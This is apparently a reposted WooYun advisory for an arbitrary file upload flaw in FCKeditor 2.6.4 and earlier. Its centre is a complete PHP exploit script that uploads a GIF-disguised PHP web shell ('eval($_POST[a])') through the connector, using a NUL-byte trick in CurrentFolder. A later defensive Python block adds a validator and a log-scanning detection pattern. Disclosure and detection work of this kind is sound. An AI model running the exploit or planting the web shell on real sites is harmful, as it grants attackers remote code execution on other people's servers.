fckeditor 2.6 php, fckeditor <= 2.6.4 arbitrary file upload vulnerability

Vulnerability summary

Defect ID: WooYun-2011-01684

Title: fckeditor <= 2.6.4 arbitrary file upload vulnerability

Affected vendor: fckeditor

Author: 我勒个去

Submitted: 2011-03-22 14:09

Published: 2011-03-22 14:18

Type: file upload leading to arbitrary code execution

Severity: High

Self-assessed Rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Tags:

Vulnerability details

Disclosure status:

2011-03-22: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public

2011-03-22: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

fckeditor <= 2.6.4 arbitrary file upload vulnerability. The PHP and ColdFusion versions should be KO'd, ASP is unfazed, other language versions untested.

Details:

The filtering on CurrentFolder is weak, but GPC (magic_quotes_gpc) is enough to cripple it.

Proof of concept:

<?php
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));

$match = array();

// Send a raw HTTP request to port 80 and return the full response.
function http_send($host, $packet)
{
    $sock = fsockopen($host, 80);
    while (!$sock)
    {
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
    }
    fputs($sock, $packet);
    $resp = '';
    while (!feof($sock)) $resp .= fread($sock, 1024);
    fclose($sock);
    print $resp;
    return $resp;
}

// The connector answers with a JavaScript OnUploadCompleted(code, "url") call;
// code 0 means stored, 201 means stored under a renamed file name.
function connector_response($html)
{
    global $match;
    return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}

print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ     |";
print "\n+------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] host path\n";
    print "\nExample....: php $argv[0] localhost /\n";
    print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
    die();
}

$host = $argv[1];
$path = preg_replace("#/{2,}#", "/", $argv[2]);   // collapse repeated slashes (was ereg_replace, removed in PHP 7)

$filename   = "fvck.gif";
$foldername = "fuck.php%00.gif";   // CurrentFolder value carrying an encoded NUL byte; the extension check only sees ".gif"
$connector  = "editor/filemanager/connectors/php/connector.php";

// Multipart body: an image-looking upload whose content is a PHP file.
$payload  = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";

$packet  = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
//print $packet;
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

print $packet;

if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";
?>


Fix:

See the fix at **.**.**.**
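As an added example (not part of this report or of FCKeditor's own code), the Python below models the mismatch the PoC relies on: a string-level extension check sees ".gif" while the NUL-terminated path handed to the filesystem ends in ".php". It pairs that with an allow-list validator for CurrentFolder and a scan over constructed access-log lines for upload requests the validator would reject; the validation rules, the log format and the sample lines are this example's own assumptions.

```python
import re
from urllib.parse import unquote

def extension_seen_by_check(name: str) -> str:
    """Extension as a naive string check sees it: after the last dot of the whole value."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def extension_seen_by_filesystem(name: str) -> str:
    """Extension as a C-string filesystem call sees it: the path stops at the first NUL byte."""
    return extension_seen_by_check(name.split("\x00", 1)[0])

def is_safe_folder_name(raw_param: str) -> bool:
    """Accept CurrentFolder only as a clean relative folder path such as "/" or "/images/2011/".

    Rules are this example's own, not FCKeditor's: decode once, refuse every control
    character (NUL included), refuse traversal and backslashes, and allow only
    [A-Za-z0-9_-] segments between single slashes, so no segment can carry an extension.
    """
    folder = unquote(raw_param)
    if any(ord(c) < 0x20 or c == "\x7f" for c in folder):
        return False
    if ".." in folder or "\\" in folder:
        return False
    return re.fullmatch(r"/(?:[A-Za-z0-9_-]+/)*", folder) is not None

# Matches the connector upload request line in a web server access log.
UPLOAD_RE = re.compile(r"connector\.php\?[^ ]*Command=FileUpload[^ ]*CurrentFolder=([^& ]*)")

def suspicious_upload_folders(log_lines):
    """Return the CurrentFolder values of upload requests that the hardened check would reject."""
    return [m.group(1) for m in map(UPLOAD_RE.search, log_lines)
            if m and not is_safe_folder_name(m.group(1))]

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Mar/2011:14:09:01 +0800] "POST /FCKeditor/editor/filemanager/connectors/php/'
    'connector.php?Command=FileUpload&Type=Image&CurrentFolder=/ HTTP/1.0" 200 512',
    '10.0.0.9 - - [22/Mar/2011:14:09:07 +0800] "POST /FCKeditor/editor/filemanager/connectors/php/'
    'connector.php?Command=FileUpload&Type=Image&CurrentFolder=x.php%00.gif HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    decoded = unquote("x.php%00.gif")
    print("check sees:", extension_seen_by_check(decoded))            # gif
    print("filesystem sees:", extension_seen_by_filesystem(decoded))  # php
    print("flagged:", suspicious_upload_folders(SAMPLE_LOG))          # ['x.php%00.gif']
```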

Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively declined

Vulnerability Rank: 12 (WooYun rating)

Comments

2010-01-01 00:00 xsser (white hat | Rank: 152, vulnerabilities: 17)

2010-01-01 00:00 Jacks (white hat | Rank: 142, vulnerabilities: 25)

Why does this code look so familiar? Isn't it the one EgiX wrote?

2010-01-01 00:00 m0r5 (white hat | Rank: 30, vulnerabilities: 6)

Isn't this the one EgiX wrote?

2010-01-01 00:00 霍家二爷 (white hat | Rank: 63, vulnerabilities: 7)

http://seclists.org/pen-test/2010/Jul/0

Truncation, truncation again.

2010-01-01 00:00 G8dSnow (white hat | Rank: 21, vulnerabilities: 5)

Truncation bites everywhere, XSS and file operations alike... can't take it anymore...

All media may repost this provided the author attribution and the link to the original are kept; otherwise our content may not be used.


Focused on network security, sharing and recording interesting resources. All resources published by 体验盒子 are for study and research purposes only and may not be used for illegal purposes; otherwise the user bears all consequences.

2006-2019 体验盒子
